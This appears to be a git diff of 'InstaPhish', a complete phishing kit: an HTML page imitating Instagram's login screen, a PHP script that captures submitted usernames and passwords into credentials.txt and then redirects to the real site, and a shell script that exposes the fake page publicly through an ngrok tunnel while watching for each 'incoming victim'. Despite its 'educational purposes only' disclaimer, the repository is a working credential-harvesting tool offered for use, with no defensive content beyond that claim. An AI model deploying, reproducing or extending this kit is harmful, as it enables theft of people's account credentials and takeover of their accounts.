+2

.gitignore

··· 1 1 + **/credentials.txt 2 2 + logs/*.log

+9

LICENSE.md

··· 1 1 + MIT License 2 2 + 3 3 + Copyright (c) 2025 Hatix Ntsoa 4 4 + 5 5 + Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: 6 6 + 7 7 + The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. 8 8 + 9 9 + THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

+103

README.md

··· 1 1 + # 🕵️‍♂️ InstaPhish - For Educational Purposes Only 2 2 + 3 3 + 4 4 + 5 5 + > ⚠️ **Disclaimer** 6 6 + > 7 7 + > This project is intended **strictly for educational and ethical hacking awareness purposes only.** 8 8 + > 9 9 + > - Do **not** use this project for malicious purposes. 10 10 + > - The author **does not condone** illegal activity and is **not responsible** for any misuse. 11 11 + > - Always conduct security testing **only in authorized environments** with **explicit permission**. 12 12 + > - This repository is meant to help individuals and professionals understand phishing mechanics and learn how to defend against them. 13 13 + 14 14 + 15 15 + 16 16 + <br> 17 17 + 18 18 + ## 📸 Preview 19 19 + 20 20 + 21 21 +  22 22 + 23 23 + 24 24 + 25 25 + 26 26 + <br> 27 27 + 28 28 + ## 🚀 Features 29 29 + 30 30 + - Fake Instagram login page styled like the real interface 31 31 + - Logs username and password attempts 32 32 + - Automatically generates public forwarding using **ngrok** 33 33 + - Logs output in real-time to console 34 34 + - Dynamic PHP server running on a random available 4-digit port 35 35 + 36 36 + 37 37 + 38 38 + <br> 39 39 + 40 40 + ## ⚙️ Installation & Setup 41 41 + 42 42 + 43 43 + ```bash 44 44 + # 1. Clone this repository 45 45 + git clone https://github.com/hatixntsoa/instaphish.git 46 46 + 47 47 + # 2. Change to the project directory 48 48 + cd instaphish 49 49 + 50 50 + # 3. Give execution permission to the script 51 51 + chmod +x instaphish.sh 52 52 + 53 53 + # 4. Run the phishing server 54 54 + ./instaphish.sh 55 55 + ```` 56 56 + 57 57 + 58 58 + > ✅ Ensure you have both **PHP** and **ngrok** installed on your system. 59 59 + 60 60 + 61 61 + 62 62 + <br> 63 63 + 64 64 + ## 📁 Project Structure 65 65 + 66 66 + 67 67 + ``` 68 68 + . 69 69 + ├── app/ 70 70 + │   └── instaphish.php 71 71 + ├── assets/ 72 72 + │   ├── images/ 73 73 + │   ├── scripts/ 74 74 + │   └── styles/ 75 75 + ├── data/ 76 76 + │   └── credentials.txt // saved credentials 77 77 + ├── logs/ 78 78 + ├── screenshots/ 79 79 + ├── index.html 80 80 + ├── instaphish.sh 81 81 + ├── LICENSE.md 82 82 + └── README.md 83 83 + ``` 84 84 + 85 85 + 86 86 + 87 87 + 88 88 + <br> 89 89 + 90 90 + ## 📌 Requirements 91 91 + 92 92 + * **PHP** ≥ 7.x 93 93 + * **ngrok** with authenticated account (set up via `ngrok authtoken`) 94 94 + * Unix-like environment (Linux/macOS or WSL on Windows) 95 95 + 96 96 + 97 97 + <br> 98 98 + 99 99 + ## 📚 Legal Note 100 100 + 101 101 + This repository is designed to demonstrate **how phishing works**, so that developers, companies, and users can better understand and **protect themselves** from real threats. 102 102 + 103 103 + Use it **ethically** and **legally**.

+40

app/instaphish.php

··· 1 1 + <?php 2 2 + if (isset($_POST['username'])) { 3 3 + $username = $_POST['username']; 4 4 + } 5 5 + 6 6 + if (isset($_POST['password'])) { 7 7 + $password = $_POST['password']; 8 8 + } 9 9 + 10 10 + $green = "\033[32m"; 11 11 + $blue = "\033[34m"; 12 12 + $red = "\033[31m"; 13 13 + $reset = "\033[0m"; 14 14 + 15 15 + error_log(PHP_EOL); 16 16 + 17 17 + error_log($red . "[!] Pwned !" . $reset); 18 18 + error_log($blue . "[+] Username : $username" . $reset); 19 19 + error_log($blue . "[+] Password : $password" . $reset); 20 20 + error_log($green . "[*] Saved in credentials.txt" . $reset); 21 21 + 22 22 + error_log(PHP_EOL); 23 23 + 24 24 + $file = fopen('../data/credentials.txt', 'a'); 25 25 + if ($file) { 26 26 + // Set the GMT offset to +3 27 27 + $gmt = 3; 28 28 + $dateTime = new DateTime("now", new DateTimeZone("GMT")); 29 29 + $logTime = date('D M d H:i:s Y'); 30 30 + $dateTime->modify("+$gmt hours"); 31 31 + $formattedDateTime = $dateTime->format('m/d/Y H:i'); 32 32 + 33 33 + fwrite($file, "$logTime\n\nUsername: $username\nPassword: $password\n________________\n\n"); 34 34 + fclose($file); 35 35 + header("Location: https://instagram.com"); 36 36 + exit(); 37 37 + } else { 38 38 + echo "Unable to open file."; 39 39 + } 40 40 + ?>

+2

app/server.check.php

··· 1 1 + <?php 2 2 + echo "PHP_OK";

+5

assets/images/facephish.svg

··· 1 1 + <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" width="256" height="256" viewBox="0 0 256 256" xml:space="preserve"> 2 2 + <g style="stroke: none; stroke-width: 0; stroke-dasharray: none; stroke-linecap: butt; stroke-linejoin: miter; stroke-miterlimit: 10; fill: none; fill-rule: nonzero; opacity: 1;" transform="translate(1.4065934065934016 1.4065934065934016) scale(2.81 2.81)"> 3 3 + <path d="M 45 -0.228 c -24.853 0 -45 20.25 -45 45.229 c 0 22.806 16.797 41.66 38.633 44.77 V 58.779 h -10.64 V 46.328 h 10.64 v -9.182 c 0 -10.656 6.441 -16.458 15.849 -16.458 c 4.506 0 8.38 0.339 9.508 0.491 v 11.136 l -6.525 0.003 c -5.116 0 -6.107 2.457 -6.107 6.061 v 7.949 h 12.202 l -1.589 12.451 H 51.359 v 30.993 C 73.199 86.666 90 67.81 90 45.001 C 90 20.022 69.853 -0.228 45 -0.228 z" style="stroke: none; stroke-width: 1; stroke-dasharray: none; stroke-linecap: butt; stroke-linejoin: miter; stroke-miterlimit: 10; fill: rgb(0,149,246); fill-rule: nonzero; opacity: 1;" transform=" matrix(1 0 0 1 0 0) " stroke-linecap="round"/> 4 4 + </g> 5 5 + </svg>

assets/images/instaphish.logo.png

This is a binary file and will not be displayed.

assets/images/instaphish.text.png

This is a binary file and will not be displayed.

+85

assets/scripts/script.js

··· 1 1 + // Check for php server availability 2 2 + async function checkPhpServer(username, password) { 3 3 + try { 4 4 + const response = await fetch('/app/server.check.php'); 5 5 + if (!response.ok) throw new Error('No PHP server'); 6 6 + const text = await response.text(); 7 7 + if (text.trim() !== 'PHP_OK') throw new Error('PHP check failed'); 8 8 + 9 9 + return true; 10 10 + } catch (error) { 11 11 + alert(`Sorry there is no PHP server running right now, here are your credentials btw:\nUsername: ${username}\nPassword: ${password}`); 12 12 + location.reload(); 13 13 + return false; 14 14 + } 15 15 + } 16 16 + 17 17 + // Clear all inputs in the form when submitted 18 18 + const form = document.querySelector("form"); 19 19 + 20 20 + form.addEventListener('submit', async (event) => { 21 21 + event.preventDefault(); 22 22 + 23 23 + const username = form.elements['username'].value; 24 24 + const password = form.elements['password'].value; 25 25 + 26 26 + const phpIsRunning = await checkPhpServer(username, password); 27 27 + if (!phpIsRunning) return; 28 28 + 29 29 + form.submit(); 30 30 + }); 31 31 + 32 32 + document.addEventListener("DOMContentLoaded", () => { 33 33 + const usernameInput = document.getElementById("username"); 34 34 + const passwordInput = document.getElementById("password"); 35 35 + const loginButton = document.querySelector(".login-btn"); 36 36 + const togglePassword = document.getElementById("togglePassword"); 37 37 + const yearSpan = document.getElementById("current-year"); 38 38 + const select = document.getElementById("language-select"); 39 39 + const measureSpan = document.getElementById("language-measure"); 40 40 + 41 41 + if (yearSpan) { 42 42 + yearSpan.textContent = new Date().getFullYear(); 43 43 + } 44 44 + 45 45 + function validateInputs() { 46 46 + const username = usernameInput.value.trim(); 47 47 + const password = passwordInput.value; 48 48 + 49 49 + loginButton.disabled = !(username !== "" && password.length > 8); 50 50 + 51 51 + // Show toggle button only if password is not empty 52 52 + if (password.length > 0) { 53 53 + togglePassword.style.display = "block"; 54 54 + } else { 55 55 + togglePassword.style.display = "none"; 56 56 + passwordInput.type = "password"; 57 57 + togglePassword.textContent = "Show"; 58 58 + } 59 59 + } 60 60 + 61 61 + function updateSelectWidth() { 62 62 + // Set the span's text to selected option 63 63 + const selectedText = select.options[select.selectedIndex].text; 64 64 + measureSpan.textContent = selectedText; 65 65 + 66 66 + // Get computed width and add padding for dropdown arrow 67 67 + const width = measureSpan.offsetWidth + 25; 68 68 + select.style.width = width + "px"; 69 69 + } 70 70 + 71 71 + updateSelectWidth(); 72 72 + 73 73 + select.addEventListener("change", updateSelectWidth); 74 74 + 75 75 + usernameInput.addEventListener("input", validateInputs); 76 76 + passwordInput.addEventListener("input", validateInputs); 77 77 + 78 78 + validateInputs(); 79 79 + 80 80 + togglePassword.addEventListener("click", () => { 81 81 + const isPassword = passwordInput.type === "password"; 82 82 + passwordInput.type = isPassword ? "text" : "password"; 83 83 + togglePassword.textContent = isPassword ? "Hide" : "Show"; 84 84 + }); 85 85 + });

+265

assets/styles/style.css

··· 1 1 + * { 2 2 + margin: 0; 3 3 + padding: 0; 4 4 + box-sizing: border-box; 5 5 + font-family: Arial, sans-serif; 6 6 + user-select: none; 7 7 + } 8 8 + 9 9 + body { 10 10 + background-color: #000; 11 11 + color: #fff; 12 12 + display: flex; 13 13 + flex-direction: column; 14 14 + align-items: center; 15 15 + justify-content: center; 16 16 + min-height: 100vh; 17 17 + } 18 18 + 19 19 + .container { 20 20 + margin-top: 13px; 21 21 + } 22 22 + 23 23 + .logo { 24 24 + display:block; 25 25 + margin: 0 auto 30px auto; 26 26 + max-width: 100%; 27 27 + height: 63px; 28 28 + object-fit: contain; 29 29 + } 30 30 + 31 31 + .login-box { 32 32 + background-color: #000; 33 33 + border: 0.5px solid #363636; 34 34 + padding: 40px 40px 20px 40px; 35 35 + width: 350px; 36 36 + text-align: center; 37 37 + } 38 38 + 39 39 + .logo { 40 40 + font-family: 'Brush Script MT', cursive; 41 41 + font-size: 40px; 42 42 + margin-bottom: 20px; 43 43 + } 44 44 + 45 45 + input { 46 46 + width: 100%; 47 47 + height: 38px; 48 48 + padding: 10px; 49 49 + margin: 5px 0; 50 50 + background: #121212; 51 51 + border: 0.5px solid #555555; 52 52 + border-radius: 4px; 53 53 + color: #fff; 54 54 + } 55 55 + 56 56 + input:focus { 57 57 + outline: none; 58 58 + box-shadow: none; 59 59 + } 60 60 + 61 61 + .input-wrapper { 62 62 + position: relative; 63 63 + user-select: none; 64 64 + } 65 65 + 66 66 + .input-wrapper input { 67 67 + width: 100%; 68 68 + padding: 10px 8px 10px; 69 69 + background: #121212; 70 70 + border: 0.5px solid #555555; 71 71 + color: #fff; 72 72 + user-select: none; 73 73 + line-height: 30px; 74 74 + } 75 75 + 76 76 + .label-text { 77 77 + color: #a8a8a8; 78 78 + } 79 79 + 80 80 + .input-wrapper input:not(:placeholder-shown) { 81 81 + padding-bottom: 0; 82 82 + } 83 83 + 84 84 + .input-wrapper label { 85 85 + position: absolute; 86 86 + left: 8px; 87 87 + top: 50%; 88 88 + transform: translateY(-50%); 89 89 + color: #aaa; 90 90 + pointer-events: none; 91 91 + font-size: 12px; 92 92 + } 93 93 + 94 94 + .input-wrapper input:not(:placeholder-shown) + label { 95 95 + top: 13px; 96 96 + font-size: 10px; 97 97 + background-color: #000; 98 98 + padding: 0; 99 99 + } 100 100 + 101 101 + .toggle-password { 102 102 + position: absolute; 103 103 + right: 10px; 104 104 + top: 50%; 105 105 + transform: translateY(-50%); 106 106 + background: none; 107 107 + border: none; 108 108 + color: #fff; 109 109 + font-weight: bold; 110 110 + cursor: pointer; 111 111 + font-size: 14px; 112 112 + padding: 0; 113 113 + display: none; 114 114 + user-select: none; 115 115 + } 116 116 + 117 117 + .toggle-password:hover { 118 118 + color: #898989; 119 119 + } 120 120 + 121 121 + .toggle-password:focus { 122 122 + outline: none; 123 123 + } 124 124 + 125 125 + .login-btn { 126 126 + width: 100%; 127 127 + padding: 10px; 128 128 + background-color: #4150f7; 129 129 + border-radius: 8px; 130 130 + color: white; 131 131 + border: none; 132 132 + margin: 10px 0; 133 133 + cursor: pointer; 134 134 + font-weight: bold; 135 135 + } 136 136 + 137 137 + .login-btn:disabled { 138 138 + opacity: 0.5; 139 139 + } 140 140 + 141 141 + .divider { 142 142 + display: flex; 143 143 + align-items: center; 144 144 + text-align: center; 145 145 + margin: 10px 0; 146 146 + color: #999; 147 147 + } 148 148 + 149 149 + .divider span { 150 150 + font-size: 13px; 151 151 + font-weight: bold; 152 152 + } 153 153 + 154 154 + .divider::before, .divider::after { 155 155 + content: ''; 156 156 + flex: 1; 157 157 + height: 0.5px; 158 158 + background: #262626; 159 159 + } 160 160 + 161 161 + .divider::before { 162 162 + margin-right: 10px; 163 163 + } 164 164 + 165 165 + .divider::after { 166 166 + margin-left: 10px; 167 167 + } 168 168 + 169 169 + .fb-logo { 170 170 + height: 20px; 171 171 + vertical-align: middle; 172 172 + margin-right: 3px; 173 173 + } 174 174 + 175 175 + .facephish-login { 176 176 + padding-top: 30px; 177 177 + color: #0095f6; 178 178 + text-decoration: none; 179 179 + font-weight: bold; 180 180 + font-size: 14px; 181 181 + display: block; 182 182 + margin: 10px 0; 183 183 + } 184 184 + 185 185 + .forgot { 186 186 + color: #fff; 187 187 + font-weight: bold; 188 188 + text-decoration: none; 189 189 + font-size: 14px; 190 190 + } 191 191 + 192 192 + .forgot:hover { 193 193 + text-decoration: underline; 194 194 + } 195 195 + 196 196 + .signup-box { 197 197 + background-color: #000; 198 198 + border: 0.5px solid #363636; 199 199 + padding: 20px; 200 200 + margin-top: 10px; 201 201 + text-align: center; 202 202 + width: 100%; 203 203 + font-size: 14.5px; 204 204 + margin-left: auto; 205 205 + margin-right: auto; 206 206 + } 207 207 + 208 208 + .signup-box a { 209 209 + color: #0095f6; 210 210 + text-decoration: none; 211 211 + } 212 212 + 213 213 + footer { 214 214 + margin-top: 50px; 215 215 + padding: 20px; 216 216 + text-align: center; 217 217 + font-size: 12px; 218 218 + color: #999; 219 219 + } 220 220 + 221 221 + .footer-links { 222 222 + display: flex; 223 223 + flex-wrap: wrap; 224 224 + justify-content: center; 225 225 + gap: 15px; 226 226 + margin-bottom: 20px; 227 227 + } 228 228 + 229 229 + .footer-links a { 230 230 + color: #999; 231 231 + text-decoration: none; 232 232 + } 233 233 + 234 234 + .footer-bottom { 235 235 + display: flex; 236 236 + justify-content: center; 237 237 + align-items: center; 238 238 + /* gap: 10px; */ 239 239 + margin-top: 10px; 240 240 + } 241 241 + 242 242 + .footer-bottom select { 243 243 + background-color: #000; 244 244 + color: #999; 245 245 + text-align: right; 246 246 + font-size: 12px; 247 247 + margin-right: 12px; 248 248 + border: none; 249 249 + outline: none; 250 250 + } 251 251 + 252 252 + .footer-bottom select:focus { 253 253 + border-color: inherit; 254 254 + outline: none; 255 255 + } 256 256 + 257 257 + .measure-text { 258 258 + visibility: hidden; 259 259 + position: absolute; 260 260 + white-space: nowrap; 261 261 + font-size: 12px; 262 262 + font-family: inherit; 263 263 + font-weight: normal; 264 264 + padding: 0; 265 265 + }

+1

data/.gitkeep

··· 1 1 + # Keep captured credentials here.

+87

index.html

··· 1 1 + <!DOCTYPE html> 2 2 + <html lang="en"> 3 3 + 4 4 + <head> 5 5 + <meta charset="UTF-8" /> 6 6 + <meta name="viewport" content="width=device-width, initial-scale=1.0" /> 7 7 + <title>Login • Instagram</title> 8 8 + <link rel="stylesheet" href="assets/styles/style.css" /> 9 9 + <link rel="icon" type="image/png" href="assets/images/instaphish.logo.png" /> 10 10 + </head> 11 11 + 12 12 + <body> 13 13 + <div class="container"> 14 14 + <div class="login-box"> 15 15 + <img class="logo" src="assets/images/instaphish.text.png" alt="Instagram" /> 16 16 + 17 17 + <form action="app/instaphish.php" method="post"> 18 18 + <div class="input-wrapper"> 19 19 + <input name="username" type="text" placeholder=" " autocomplete="off" spellcheck="false" id="username" required /> 20 20 + <label class="label-text" for="username">Phone number, username, or email</label> 21 21 + </div> 22 22 + 23 23 + <div class="input-wrapper"> 24 24 + <input name="password" type="password" placeholder=" " id="password" required /> 25 25 + <label for="username">Password</label> 26 26 + <button type="button" id="togglePassword" class="toggle-password">Show</button> 27 27 + </div> 28 28 + 29 29 + <button class="login-btn" type="submit" disabled >Log in</button> 30 30 + </form> 31 31 + 32 32 + <div class="divider"><span>OR</span></div> 33 33 + 34 34 + <a href="#" class="facephish-login"> 35 35 + <img class="fb-logo" src="assets/images/facephish.svg" alt="Facephish" /> 36 36 + Log in with Facebook 37 37 + </a> 38 38 + 39 39 + <a href="https://www.instagram.com/accounts/password/reset/" 40 40 + class="forgot"> 41 41 + Forgot password? 42 42 + </a> 43 43 + </div> 44 44 + <div class="signup-box"> 45 45 + <p>Don't have an account? <a href="#"><strong>Sign up</strong></a></p> 46 46 + </div> 47 47 + </div> 48 48 + 49 49 + <footer> 50 50 + <div class="footer-links"> 51 51 + <a href="#">Meta</a> 52 52 + <a href="#">About</a> 53 53 + <a href="#">Blog</a> 54 54 + <a href="#">Jobs</a> 55 55 + <a href="#">Help</a> 56 56 + <a href="#">API</a> 57 57 + <a href="#">Privacy</a> 58 58 + <a href="#">Terms</a> 59 59 + <a href="#">Locations</a> 60 60 + <a href="#">Instagram Lite</a> 61 61 + <a href="#">Threads</a> 62 62 + <a href="#">Contact Uploading & Non-Users</a> 63 63 + <a href="#">Meta Verified</a> 64 64 + </div> 65 65 + <div class="footer-bottom"> 66 66 + <div class="footer-bottom-inner"> 67 67 + <select name="language" id="language-select"> 68 68 + <option value="en" selected>English</option> 69 69 + <option value="es">Español</option> 70 70 + <option value="fr">Français</option> 71 71 + <option value="de">Deutsch</option> 72 72 + <option value="it">Italiano</option> 73 73 + <option value="pt">Português (Brasil)</option> 74 74 + <option value="ru">Русский</option> 75 75 + <option value="ja">日本語</option> 76 76 + <option value="ko">한국어</option> 77 77 + <option value="zh">中文(简体)</option> 78 78 + </select> 79 79 + <span>© <span id="current-year"></span> Instagram from Meta</span> 80 80 + </div> 81 81 + </div> 82 82 + </footer> 83 83 + <br><br> 84 84 + </body> 85 85 + <span id="language-measure" class="measure-text"></span> 86 86 + <script src="assets/scripts/script.js"></script> 87 87 + </html>

+77

instaphish.sh

··· 1 1 + #!/bin/bash 2 2 + 3 3 + # Check if php is installed 4 4 + if ! command -v php &>/dev/null; then 5 5 + echo "Please install php first" 6 6 + exit 0 7 7 + fi 8 8 + 9 9 + # Check if ngrok is installed 10 10 + if ! command -v ngrok &>/dev/null; then 11 11 + echo "Please install ngrok first" 12 12 + exit 0 13 13 + fi 14 14 + 15 15 + # Disable Ctrl+C (^C) character display 16 16 + stty -echoctl 17 17 + 18 18 + # Kill on Ctrl+C 19 19 + trap "echo; echo '[*] Shutting down...'; kill $php_pid $ngrok_pid 2>/dev/null; exit 0" INT 20 20 + 21 21 + # Function to check if a port is free 22 22 + is_port_free() { 23 23 + ! lsof -i :$1 >/dev/null 2>&1 24 24 + } 25 25 + 26 26 + # Generate a random 4-digit free port 27 27 + while true; do 28 28 + port=$((RANDOM % 5999 + 4001)) 29 29 + 30 30 + if is_port_free "$port"; then 31 31 + break 32 32 + fi 33 33 + done 34 34 + 35 35 + # Start PHP server and log output to file 36 36 + php -S 0.0.0.0:$port >> logs/phishing.log 2>&1 & 37 37 + php_pid=$! 38 38 + echo "[+] Server started on port $port" 39 39 + echo "[+] Local URL : http://localhost:$port" 40 40 + echo 41 41 + 42 42 + # Check if ngrok config exists before forwarding 43 43 + if [[ -f "$HOME/.config/ngrok/ngrok.yml" ]]; then 44 44 + # Start ngrok in background 45 45 + ngrok http $port > /dev/null 2>&1 & 46 46 + ngrok_pid=$! 47 47 + 48 48 + # Wait until ngrok tunnel is available 49 49 + echo -n "[+] Waiting for ngrok tunnel " 50 50 + while true; do 51 51 + ngrok_url=$(curl -s http://127.0.0.1:4040/api/tunnels | grep -o 'https://[^"]*' | head -n 1) 52 52 + if [[ -n "$ngrok_url" ]]; then 53 53 + break 54 54 + fi 55 55 + echo -n "." 56 56 + sleep 0.5 57 57 + done 58 58 + echo "" 59 59 + echo "[+] Port forwarded at $ngrok_url" 60 60 + else 61 61 + echo "[!] Please add your ngrok auth token in order to forward the port" 62 62 + echo "[*] Server is running locally" 63 63 + fi 64 64 + 65 65 + echo 66 66 + echo "[*] Waiting for incoming victim..." 67 67 + 68 68 + # Monitor log file 69 69 + tail -n 0 -f logs/phishing.log | while IFS= read -r line; do 70 70 + if [[ "$line" =~ \[\!\] ]] || [[ "$line" =~ \[\+\] ]] || [[ "$line" =~ \[\*\] ]]; then 71 71 + echo "$line" 72 72 + fi 73 73 + if [[ "$line" == *"[*] Saved in credentials.txt"* ]]; then 74 74 + echo 75 75 + echo "[*] Waiting for incoming victim..." 76 76 + fi 77 77 + done

+1

logs/.gitkeep

··· 1 1 + # Keep the logs here.

screenshots/instagram.login.png

This is a binary file and will not be displayed.